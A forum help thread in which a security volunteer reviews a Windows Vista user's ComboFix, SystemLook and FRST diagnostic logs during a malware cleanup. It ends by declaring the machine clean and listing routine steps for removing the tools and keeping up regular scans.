"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{597B495C-7D2A-4C09-9473-E34D0C324223}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\DriverDoc_UPDATES => key not found.
"HKU\S-1-5-21-1782139309-2775357304-4162436881-1000\Software\Classes\13cb9" => key removed successfully
"HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully
"HKU\S-1-5-21-1782139309-2775357304-4162436881-1000\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully

=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 40340880 B
Java, Flash, Steam htmlcache => 0 B
Windows/system/drivers => 12093 B
Edge => 0 B
Chrome => 0 B
Firefox => 39167449 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 66228 B
systemprofile32 => 66228 B
LocalService => 0 B
LocalService => 0 B
NetworkService => 654100 B
NetworkService => 0 B
Me => 5753713 B

RecycleBin => 0 B
EmptyTemp: => 90.1 MB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 12:19:27 ====


SystemLook 30.07.11 by jpshortstuff
Log created at 12:22 on 24/12/2016 by Me
Administrator - Elevation successful

========== reg ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Beep]
"ErrorControl"= 0x0000000001 (1)
"Group"="Base"
"Start"= 0x0000000001 (1)
"Tag"= 0x0000000002 (2)
"Type"= 0x0000000001 (1)


[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\iaStor]
"Type"= 0x0000000001 (1)
"Start"= 0x0000000000 (0)
"ErrorControl"= 0x0000000001 (1)
"Tag"= 0x0000000019 (25)
"ImagePath"="system32\DRIVERS\iaStor.sys"
"DisplayName"="Intel AHCI Controller"
"Group"="SCSI Miniport"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\iaStor\Parameters]
"queuePriorityEnable"= 0x0000000000 (0)
"BusType"= 0x0000000003 (3)

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\iaStor\Parameters\Port0]
"AN"= 0x0000000000 (0)
"LPM"= 0x0000000000 (0)
"LPMSTATE"= 0x0000000000 (0)
"LPMDSTATE"= 0x0000000001 (1)
"GTF"= 0x0000000001 (1)
"DIPM"= 0x0000000001 (1)

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\iaStor\Parameters\Port1]
"AN"= 0x0000000000 (0)
"LPM"= 0x0000000000 (0)
"LPMSTATE"= 0x0000000000 (0)
"LPMDSTATE"= 0x0000000001 (1)
"GTF"= 0x0000000001 (1)
"DIPM"= 0x0000000001 (1)

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\iaStor\Parameters\Port2]
"AN"= 0x0000000000 (0)
"LPM"= 0x0000000000 (0)
"LPMSTATE"= 0x0000000000 (0)
"LPMDSTATE"= 0x0000000001 (1)
"GTF"= 0x0000000001 (1)
"DIPM"= 0x0000000001 (1)

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\iaStor\Parameters\Port3]
"AN"= 0x0000000000 (0)
"LPM"= 0x0000000000 (0)
"LPMSTATE"= 0x0000000000 (0)
"LPMDSTATE"= 0x0000000001 (1)
"GTF"= 0x0000000001 (1)
"DIPM"= 0x0000000001 (1)

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\iaStor\Parameters\Port4]
"AN"= 0x0000000000 (0)
"LPM"= 0x0000000000 (0)
"LPMSTATE"= 0x0000000000 (0)
"LPMDSTATE"= 0x0000000001 (1)
"GTF"= 0x0000000001 (1)
"DIPM"= 0x0000000001 (1)

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\iaStor\Parameters\Port5]
"AN"= 0x0000000000 (0)
"LPM"= 0x0000000000 (0)
"LPMSTATE"= 0x0000000000 (0)
"LPMDSTATE"= 0x0000000001 (1)
"GTF"= 0x0000000001 (1)
"DIPM"= 0x0000000001 (1)

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\iaStor\Enum]
"0"="Root\LEGACY_IASTOR\0000"
"Count"= 0x0000000001 (1)
"NextInstance"= 0x0000000001 (1)


[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\IpInIp]
"Type"= 0x0000000001 (1)
"Start"= 0x0000000003 (3)
"ErrorControl"= 0x0000000001 (1)
"ImagePath"="system32\DRIVERS\ipinip.sys"
"DisplayName"="IP in IP Tunnel Driver"
"DependOnService"="Tcpip"
"Description"="IP in IP Tunnel Driver"


========== filefind ==========

Searching for "beep.sys"
No files found.

Searching for "iaStor.sys"
No files found.

Searching for "ipinip.sys"
No files found.

-= EOF =-


Thank You :) Merry Christmas
win98forever is offline  
Old 12-24-2016, 09:00 PM   #13
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 
chemist's Avatar

Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Hello again, win98forever. You're very welcome. Merry Christmas. :)

Quote:
while I waited I inquired what new OS I might upgrade to in another thread
I would highly suggest you upgrade. VISTA wasn't good to begin with, is very old, and in my opinion, is not worth fixing anymore.

Are you going to upgrade?

------------------------------------------------------
__________________
Our services are free, but you may contribute to the author of ComboFix via PayPal

Proud member of UNITE

Microsoft MVP - Consumer Security 2014, 2015
chemist is offline  
Old 12-24-2016, 09:53 PM   #14
TSF Enthusiast
 
Join Date: Jul 2009
Posts: 687
OS: vista home premium, Windows 10



Eventually when I have the money.
win98forever is offline  
Old 12-25-2016, 09:00 AM   #15
TSF Enthusiast
 
Join Date: Jul 2009
Posts: 687
OS: vista home premium, Windows 10



Are we done?
This morning I noticed the scheduled scan in MSE had not started so I manually updated it and am running a scan by manually starting it. I can only assume something is wrong there since it worked for years auto updating and auto scanning until the updates issue started a few months ago.
win98forever is offline  
Old 12-25-2016, 07:50 PM   #16
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 
chemist's Avatar

Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Not yet. Try uninstalling Security Essentials, rebooting, and reinstalling. Let me know.

Also, run FRST again, making sure the Addition.txt box is ticked, and post/attach the logs as before. Thanks.
__________________
Our services are free, but you may contribute to the author of ComboFix via PayPal

Proud member of UNITE

Microsoft MVP - Consumer Security 2014, 2015
chemist is offline  
Old 12-26-2016, 08:59 AM   #17
TSF Enthusiast
 
Join Date: Jul 2009
Posts: 687
OS: vista home premium, Windows 10



I ran the scan with MSE uninstalled. I reinstalled it and it seems frozen in update about 1/4 the way on the indicator bar. This is the same thing it does when I am having updating problems with it.

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 21-12-2016
Ran by Me (administrator) on ME-PC (26-12-2016 08:43:01)
Running from C:\Users\Me\Desktop
Loaded Profiles: Me (Available Profiles: Me)
Platform: Windows Vista (TM) Home Premium Service Pack 2 (X64) Language: English (United States)
Internet Explorer Version 9 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: FRST Tutorial - How to use Farbar Recovery Scan Tool - Malware Removal Guides and Tutorials

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(Synaptics, Inc.) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Realtek Semiconductor) C:\Windows\RAVCpl64.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Microsoft Corporation) C:\Windows\ehome\ehtray.exe
(TOSHIBA CORPORATION) C:\Program Files (x86)\Toshiba\ConfigFree\NDSTray.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(TOSHIBA CORPORATION) C:\Program Files (x86)\Toshiba\ConfigFree\CFSwMgr.exe
(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe
(Synaptics, Inc.) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [TPwrMain] => C:\Program Files\TOSHIBA\Power Saver\TPwrMain.EXE [431968 2008-02-06] (TOSHIBA Corporation)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [1573160 2008-08-14] (Synaptics, Inc.)
HKLM\...\Run: [SmoothView] => C:\Program Files\Toshiba\SmoothView\SmoothView.exe [518008 2008-06-02] (TOSHIBA Corporation)
HKLM\...\Run: [Skytel] => C:\Windows\Skytel.exe [1826816 2007-11-20] (Realtek Semiconductor Corp.)
HKLM\...\Run: [RtHDVCpl] => C:\Windows\RAVCpl64.exe [6156288 2008-04-08] (Realtek Semiconductor)
HKLM\...\Run: [HSON] => C:\Program Files\TOSHIBA\TBS\HSON.exe [52560 2007-12-06] (TOSHIBA Corporation)
HKLM\...\Run: [00TCrdMain] => C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe [865280 2008-05-09] (TOSHIBA Corporation)
HKLM-x32\...\Run: [NDSTray.exe] => NDSTray.exe
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2016-09-22] (Oracle Corporation)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-1782139309-2775357304-4162436881-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [138240 2008-01-20] (Microsoft Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Office.lnk [2015-05-10]
ShortcutTarget: Microsoft Office.lnk -> C:\Program Files (x86)\Microsoft Office\Office\OSA9.EXE (Microsoft Corporation)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 75.75.75.75 75.75.76.76
Tcpip\..\Interfaces\{C12D3495-9B83-4917-A534-5FCF1ED20B86}: [DhcpNameServer] 75.75.75.75 75.75.76.76

Internet Explorer:
==================
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.toshibadirect.com/dpdstart
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-1782139309-2775357304-4162436881-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-1782139309-2775357304-4162436881-1000\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
SearchScopes: HKLM -> {433BB3A7-874E-436B-BD51-239C6921FE98} URL = hxxp://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}&ie={inputEncoding}&oe={outputEncoding}&startIndex={startIndex?}&startPage={startPage};
SearchScopes: HKLM-x32 -> {7CC94BCA-8E5E-4FAD-ACE5-798C208642BC} URL = hxxp://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}&ie={inputEncoding}&oe={outputEncoding}&startIndex={startIndex?}&startPage={startPage}
SearchScopes: HKU\S-1-5-21-1782139309-2775357304-4162436881-1000 -> {56B663A7-8091-4EF3-A706-11C321B76ABB} URL = hxxps://search.yahoo.com/search?p={searchTerms}&fr=yset_ie_syc_oracle&type=orcl_default
SearchScopes: HKU\S-1-5-21-1782139309-2775357304-4162436881-1000 -> {7CC94BCA-8E5E-4FAD-ACE5-798C208642BC} URL = hxxp://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}&ie={inputEncoding}&oe={outputEncoding}&startIndex={startIndex?}&startPage={startPage}
BHO-x32: Ghostery Plugin -> {6BF739DD-3323-4C6A-975B-C7E00A50B154} -> C:\Program Files (x86)\Ghostery\bin\ghostery.dll [2015-10-30] (Ghostery, Inc.)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\ssv.dll [2016-10-19] (Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\jp2ssv.dll [2016-10-19] (Oracle Corporation)
Handler-x32: http - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-12-02] (Microsoft Corporation)
Handler-x32: http - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-12-02] (Microsoft Corporation)
Handler-x32: https - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-12-02] (Microsoft Corporation)
Handler-x32: https - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-12-02] (Microsoft Corporation)
Handler-x32: ipp - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-12-02] (Microsoft Corporation)
Handler-x32: msdaipp - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-12-02] (Microsoft Corporation)
Handler-x32: msdaipp - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-12-02] (Microsoft Corporation)

FireFox:
========
FF ProfilePath: C:\Users\Me\AppData\Roaming\Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897 [2016-12-26]
FF DefaultSearchEngine.US: Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897 -> Bing
FF Homepage: Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897 -> about:home
FF NetworkProxy: Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897 -> type", 0
FF Extension: (Adblock Plus Pop-up Addon) - C:\Users\Me\AppData\Roaming\Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897\Extensions\[email protected] [2016-04-27]
FF Extension: (Ghostery) - C:\Users\Me\AppData\Roaming\Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897\Extensions\[email protected] [2016-11-29]
FF Extension: (Facebook™ Disconnect) - C:\Users\Me\AppData\Roaming\Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897\Extensions\[email protected] [2016-09-06]
FF Extension: (Flagfox) - C:\Users\Me\AppData\Roaming\Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897\Extensions\{1018e4d6-728f-4b20-ad56-37578a4de76b}.xpi [2016-12-16]
FF Extension: (NoScript) - C:\Users\Me\AppData\Roaming\Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897\Extensions\{73a6fe31-595d-460b-a920-fcc0f8843232}.xpi [2016-11-29]
FF Extension: (Adblock Plus) - C:\Users\Me\AppData\Roaming\Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-11-23]
FF Extension: (BetterPrivacy) - C:\Users\Me\AppData\Roaming\Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897\Extensions\{d40f5e7b-d2cf-4856-b441-cc613eeffbe3}.xpi [2016-10-31]
FF SearchPlugin: C:\Users\Me\AppData\Roaming\Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897\searchplugins\yahoo-ysp.xml [2015-11-23]
FF ProfilePath: C:\Users\Me\AppData\Roaming\kompozer.net\KompoZer\Profiles\rx44r1ux.default [2015-05-27]
FF HKLM-x32\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: (Microsoft .NET Framework Assistant) - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2015-05-10] [not signed]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_24_0_0_186.dll [2016-12-13] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_24_0_0_186.dll [2016-12-13] ()
FF Plugin-x32: @java.com/DTPlugin,version=11.111.2 -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\dtplugin\npDeployJava1.dll [2016-10-19] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.111.2 -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\plugin2\npjp2.dll [2016-10-19] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll [2008-07-29] (Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll [2015-09-24] (Adobe Systems Inc.)

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S4 ConfigFree Gadget Service; C:\Program Files (x86)\TOSHIBA\ConfigFree\CFProcSRVC.exe [36864 2008-04-03] (TOSHIBA Corporation.) [File not signed]
S4 ConfigFree Service; C:\Program Files (x86)\TOSHIBA\ConfigFree\CFSvcs.exe [40960 2008-04-16] (TOSHIBA CORPORATION) [File not signed]
S4 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe [69632 2005-11-14] (Macrovision Corporation) [File not signed]
S4 jswpsapi; C:\Program Files (x86)\Jumpstart\jswpsapi.exe [954368 2008-04-16] (Atheros Communications, Inc.) [File not signed]
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2010-08-06] (Hewlett-Packard) [File not signed]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2010-08-06] (Hewlett-Packard) [File not signed]
S4 ReflectService.exe; C:\Program Files\Macrium\Reflect\ReflectService.exe [3272656 2014-07-21] (Paramount Software UK Ltd)
S4 SmartFaceVWatchSrv; C:\Program Files\TOSHIBA\SmartFaceV\SmartFaceVWatchSrv.exe [84992 2008-04-24] (Toshiba) [File not signed]
S4 TNaviSrv; C:\Program Files (x86)\Toshiba\TOSHIBA DVD PLAYER\TNaviSrv.exe [83312 2008-07-18] (TOSHIBA Corporation)
S4 TODDSrv; C:\Windows\system32\TODDSrv.exe [135168 2007-11-21] (TOSHIBA Corporation) [File not signed]
S4 TOSHIBA SMART Log Service; C:\Program Files\TOSHIBA\SMARTLogService\TosIPCSrv.exe [175104 2007-12-03] (TOSHIBA Corporation) [File not signed]
S4 UleadBurningHelper; C:\Program Files (x86)\Common Files\Ulead Systems\DVD\ULCDRSvr.exe [49152 2006-08-23] (Ulead Systems, Inc.) [File not signed]
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [383544 2008-01-20] (Microsoft Corporation)
S3 hpqcxs08; C:\Program Files (x86)\HP\Digital Imaging\bin\hpqcxs08.dll [X]
S4 IAANTMON; C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAANTMon.exe [X]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

U5 AppMgmt; C:\Windows\system32\svchost.exe [27648 2008-01-20] (Microsoft Corporation)
S1 Beep; no ImagePath
S3 PSMounterEx; C:\Windows\system32\drivers\psmounterex.sys [169992 2015-04-02] (Windows (R) Win 7 DDK provider)
S3 PSVolAcc; C:\Windows\System32\Drivers\PSVolAcc.sys [12760 2014-07-21] (Paramount Software UK Ltd)
S3 WIMMount; C:\Program Files\Macrium\Reflect\wimmount.sys [22096 2015-05-14] (Microsoft Corporation)
S0 iaStor; system32\DRIVERS\iaStor.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-12-26 08:43 - 2016-12-26 08:43 - 00012851 _____ C:\Users\Me\Desktop\FRST.txt
2016-12-26 08:41 - 2016-12-26 08:41 - 00000000 ___SD C:\ComboFix
2016-12-25 10:30 - 2016-12-25 10:30 - 00000000 ____D C:\Users\Me\Desktop\1ROMER
2016-12-24 12:17 - 2016-12-26 08:41 - 00000000 ____D C:\Users\Me\Desktop\fix
2016-12-23 08:24 - 2016-12-23 08:24 - 00899584 _____ (Farbar) C:\Users\Me\Desktop\FSS.exe
2016-12-22 15:02 - 2016-12-26 08:43 - 00000000 ____D C:\FRST
2016-12-22 15:01 - 2016-12-22 15:01 - 02420736 _____ (Farbar) C:\Users\Me\Desktop\FRST64.exe
2016-12-22 11:41 - 2016-12-24 12:15 - 00000000 ____D C:\Users\Me\Desktop\stuff
2016-12-22 07:46 - 2016-12-26 08:41 - 00000000 ____D C:\Qoobox
2016-12-22 07:46 - 2011-06-25 22:45 - 00256000 _____ C:\Windows\PEV.exe
2016-12-22 07:46 - 2010-11-07 09:20 - 00208896 _____ C:\Windows\MBR.exe
2016-12-22 07:46 - 2009-04-19 20:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2016-12-22 07:46 - 2000-08-30 16:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2016-12-22 07:46 - 2000-08-30 16:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2016-12-22 07:46 - 2000-08-30 16:00 - 00098816 _____ C:\Windows\sed.exe
2016-12-22 07:46 - 2000-08-30 16:00 - 00080412 _____ C:\Windows\grep.exe
2016-12-22 07:46 - 2000-08-30 16:00 - 00068096 _____ C:\Windows\zip.exe
2016-12-22 07:45 - 2016-12-22 07:58 - 00000000 ____D C:\Windows\erdnt
2016-12-22 07:25 - 2016-12-22 07:25 - 05659917 ____R (Swearware) C:\Users\Me\Desktop\ComboFix.exe
2016-12-20 11:30 - 2016-12-20 11:48 - 00000000 ____D C:\Users\Me\Desktop\house pics
2016-12-18 15:52 - 2016-12-18 15:52 - 00000000 ____D C:\Windows\CheckSur
2016-12-18 12:16 - 2016-12-18 12:16 - 00000000 ____D C:\65c7b20dc424bda6bd39db516b4d
2016-12-18 09:45 - 2016-12-18 09:45 - 00000000 ____D C:\2b654b41d190c0d9a397eb33

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-12-26 08:42 - 2006-11-02 05:33 - 00000000 ____D C:\Windows\inf
2016-12-26 08:40 - 2006-11-02 04:46 - 00758370 _____ C:\Windows\system32\PerfStringBackup.INI
2016-12-26 08:36 - 2006-11-02 07:42 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-12-26 08:36 - 2006-11-02 07:22 - 00003616 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2016-12-26 08:36 - 2006-11-02 07:22 - 00003616 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2016-12-26 08:35 - 2006-11-02 07:42 - 00032568 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2016-12-26 08:34 - 2016-11-18 12:30 - 00000000 ____D C:\Users\Me\AppData\LocalLow\Mozilla
2016-12-26 08:33 - 2015-05-10 08:02 - 00001945 _____ C:\Windows\epplauncher.mif
2016-12-25 20:03 - 2016-05-06 12:01 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2016-12-25 14:04 - 2015-05-10 06:56 - 00000000 ____D C:\Users\Me\AppData\Roaming\Macromedia
2016-12-23 19:57 - 2015-07-10 09:12 - 00000000 ____D C:\Users\Me\AppData\LocalLow\Ghostery
2016-12-22 11:43 - 2006-11-02 07:21 - 00409496 _____ C:\Windows\system32\FNTCACHE.DAT
2016-12-22 07:58 - 2006-11-02 04:34 - 00000215 _____ C:\Windows\system.ini
2016-12-22 07:37 - 2015-07-09 06:57 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2016-12-22 07:30 - 2015-07-07 06:28 - 00000000 ____D C:\AdwCleaner
2016-12-17 10:26 - 2016-06-17 13:37 - 06858912 _____ (ESET spol. s r.o.) C:\Users\Me\Desktop\esetonlinescanner_enu.exe
2016-12-14 07:15 - 2015-05-10 07:22 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-12-13 11:04 - 2016-05-06 12:01 - 00802904 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2016-12-13 11:04 - 2016-05-06 12:01 - 00144472 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2016-12-13 11:04 - 2016-05-06 12:01 - 00003682 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2016-12-13 11:04 - 2015-05-10 10:30 - 00000000 ____D C:\Windows\system32\Macromed
2016-12-13 11:04 - 2008-08-18 10:23 - 00000000 ____D C:\Windows\SysWOW64\Macromed
2016-12-13 08:32 - 2015-05-14 14:58 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-12-04 14:20 - 2015-05-10 06:56 - 00000000 ____D C:\Users\Me\AppData\Roaming\Intelli-studio

==================== Files in the root of some directories =======

2015-05-10 07:00 - 2012-03-25 08:43 - 0000680 _____ () C:\Users\Me\AppData\Local\d3d9caps.dat
2015-05-10 07:00 - 2016-09-10 13:49 - 0001460 _____ () C:\Users\Me\AppData\Local\d3d9caps64.dat
2015-05-10 07:00 - 2016-03-31 07:42 - 0010240 _____ () C:\Users\Me\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2015-05-10 07:00 - 2013-03-18 16:21 - 0386444 _____ () C:\Users\Me\AppData\Local\dd_vcredistMSI25C2.txt
2015-05-10 07:00 - 2013-03-18 16:21 - 0011374 _____ () C:\Users\Me\AppData\Local\dd_vcredistUI25C2.txt
2015-06-09 07:44 - 2016-11-23 09:56 - 0020468 _____ () C:\ProgramData\hpzinstall.log
2015-05-10 05:55 - 2015-05-10 05:55 - 0005115 _____ () C:\ProgramData\N360BUOptions.ini

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2016-12-26 08:32

==================== End of FRST.txt ============================
Attached Files
File Type: txt Addition.txt (27.6 KB, 4 views)
win98forever is offline  
Old 12-26-2016, 09:22 AM   #18
TSF Enthusiast
 
Join Date: Jul 2009
Posts: 687
OS: vista home premium, Windows 10



I restarted and MSE updated normally.
win98forever is offline  
Old 12-26-2016, 06:57 PM   #19
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 
chemist's Avatar

Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Hello again, win98forever. If there are no other problems...

Congratulations. Well done! Your logs appear clean. You should be good to go.

Please disable Security Essentials before uninstalling ComboFix and then re-enable it after doing so.

Press the Windows "logo" key and "R" key then Copy/Paste the following single-line command into the Run box and click OK:

combofix /uninstall

This will uninstall ComboFix and delete ComboFix's quarantine folder. It will also implement some cleanup procedures, remove old System Restore Points which contain previous infections, and create a fresh, clean System Restore Point.

Please re-enable your antivirus program and any other antispyware programs disabled earlier if you haven't already.
  • Run AdwCleaner and select Uninstall
  • Confirm by clicking Yes
------------------------------------------------------

You can safely delete any tools downloaded or any logs, files, and any shortcuts on your desktop that were created during this fix.

Keep MBAM, update and run a Scan('Threat Scan' by default, or 'Scan Now' under the Dashboard tab) weekly.

Empty your Recycle Bin if it does not do so automatically.

------------------------------------------------------

Please read this and, if possible, contribute as much as you can:

